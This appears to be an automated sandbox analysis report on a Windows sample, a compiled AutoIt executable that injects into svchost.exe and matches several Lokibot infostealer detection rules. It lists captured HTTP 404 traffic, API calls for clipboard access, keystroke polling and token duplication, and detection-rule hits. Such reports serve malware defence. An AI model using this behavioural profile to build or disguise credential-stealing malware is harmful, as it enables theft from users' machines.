                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=srjJ0sjR3gsWhTHwzcAhfCVov4VPkAhvWjHt5HM%2F1OZcmw3eT38N1n4ed%2BO9ipp3RhxO7LeP3fV4lE00WqceY2vc831RyWGCeM4SyMisU%2B1OM2d7y%2FP6x3gGAGY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b281a7aa14381-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1675&rtt_var=837&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=59ZORVe8UUhlf9R%2Fk4TKpWQNesZ3t7sJO4V60IRkRiVqflmhSF47zXdLeZNlVkkxEWR9jYfXmKIHLWzBl6cHmbBBgHXnmQwXOjnYwejuKwHCGdYFAmkZZEId3cw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2832be13de95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1641&rtt_var=820&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ooqTEhxcPW1RLm9%2FD0m0nqp3ZKWx96Mi125WmUMDbkEO9i9e742xCO5SEFJQvJERyudV3KTs%2FypyvnmGMY0U06u%2B0LJ3jxeffEPv3Wkyn74moMZ56maGh5bucME%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b283efa6541de-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1737&rtt_var=868&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLoOELFBDIro5PoWMCCRykrW%2FexyIv1XjYAKxXGyz%2FU3iCYZm%2Bk4%2F7K37eZmRVkIZWaMRrCaZ%2B9zxtj4Oujq9BH3AITlr0Cz15xEdUOlQbGPw8zOq3tCMtiinS0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b284b4f584235-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPHtgvjuxpaSkrVURJCqf3Q41x2pytSbEF2ewt6hN%2BnLxWngKSJCrfn0J81%2B%2FjYswNjxWvhg0oXH4UDMDXRJVnXmO3b3WFQRMAXgVK%2Ft5Gwy9jryDmwRhLxos3g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2858f8705e60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:44:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tl7U42EuwOiFWGyhJyo9pxnwLIUcd%2Fbg8%2F37ilCJP7zpL1CnSmN3XN9HdS26f5LUSweheKAE%2BgqG8naJ0VAv8A8%2F49SbodATfSjML3YqTz0OwRuDC10FVA79vtQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28655ddd43d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7862&min_rtt=7862&rtt_var=3931&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hKd4Tp9oRmONKV8QDIVBIMlifvGacWKnTUwTAbmkH7Buk60tO8Ejf8pvURROxBDTpWTB439sCrOFVQ7KQlbA79G2AmOoS3emnARkVpm2v4mA%2BqNKNaWGn1cBZew%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b2871ab9c4310-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1949&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2C5UaBfSVGD%2FMraryUrnV3i29eg1ea2mzkYAZoMt2MkMAxgq7AdqHq3nAmbe6TAEJq1BnS7j0F18EclklcCYLc7ihFkDsNrVC9TbG9wEQ30WtLopa3HnuMgTik%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b287e18e54379-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1810&rtt_var=905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t5AbRsNF01r8gYOntG6Q3E6msi3ief4ivzAv878245PZjemKgXSqe7twYrpmsM7lp6ROmqxPnVJ8FSv6bqu0B3nR%2FxyS7JFCbTYW3gSdLVIrDf8EE5qeYSprFDM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b288a693a6a56-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1751&min_rtt=1751&rtt_var=875&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FtfXM4VZp3ggJcfnDNDt2UWKX4yuOZoUUBEF6n1FVHZQ5kvDm0xIvjmNmH57esI%2F%2BomUZuOObZs1wZl0PoR5BBH454yxDHrdWiSk3%2BX3eFpKhk%2Fd5HNMQJg1QiI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28979cf042be-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1727&rtt_var=863&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BZrANVyfdSpX%2BKsicmGOggJoUTwDzNRbNXPv%2BNddJHiOgDK%2FL8jjtqBoZ%2Bhi906D42VJo9mDhXo0jKUVF4CWa1%2FSj7%2BFGfsyzwnpjciIs3OJQaASQY0PMKrOjAo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28bc5ed60f7c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1650&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTjlACVTLGh5zici4gkACIGurjlhH1mJLx8lXhvXi%2Fh%2FlwxKYGOt37M7M0F05GOKRdhl9JS9%2BP%2BkMk5f5S2PgFS%2BqMzspFx%2FwBf0N9Y9PX%2BqSvwN2jb5Fs2KKMk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28c898f6424a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1798&rtt_var=899&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lyT0pAKIMRFVCsIKvNE0STnIanIU3velfjWzfPG%2Fn3cxNksYkJkJreMQTCMVDsZX4n5oUY7o%2BJCCb1a4tvuepuyhiB%2BfVoZHovQt4T2vWfT3P7ezDLjDXm8luaM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28d50c54184d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1635&rtt_var=817&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 20 Feb 2025 02:45:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRq6YPQN%2Bw6axKGEjq2SETts1WhKh2DmImds2pzo1NogNXe5yQvBN8JxkSsuPrBDDg5LQNiKpn1oks5h1Z7x4hkNcEignnFn2%2F7%2BZ0PKmWsHEFdylQq6QCblJrk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 914b28e1a9f84201-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1617&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=387&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                  Source: svchost.exe, svchost.exe, 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B54164
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B54164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B54164
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B53F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B53F66
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B4001C
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B6CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B6CABC

                  System Summary

                  barindex
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.vsf098633534.exe.cf0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.vsf098633534.exe.cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: Process Memory Space: vsf098633534.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: Process Memory Space: svchost.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: This is a third-party compiled AutoIt script.0_2_00AE3B3A
                  Source: vsf098633534.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: vsf098633534.exe, 00000000.00000002.1677791650.0000000000B94000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ef3b0ebc-e
                  Source: vsf098633534.exe, 00000000.00000002.1677791650.0000000000B94000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_3ec914ff-d
                  Source: vsf098633534.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dede2965-f
                  Source: vsf098633534.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_5c03f107-f
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D93540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,1_2_00D93540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D933C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00D933C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00D92720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,1_2_00D92720
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B4A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00B4A1EF
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B38310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B38310
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B451BD
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AEE6A00_2_00AEE6A0
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B0D9750_2_00B0D975
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00AEFCE00_2_00AEFCE0
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B021C50_2_00B021C5
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B162D20_2_00B162D2
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B603DA0_2_00B603DA
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B1242E0_2_00B1242E
                  Source: C:\Users\user\Desktop\vsf098633534.exeCode function: 0_2_00B025FA0_2_00B025FA
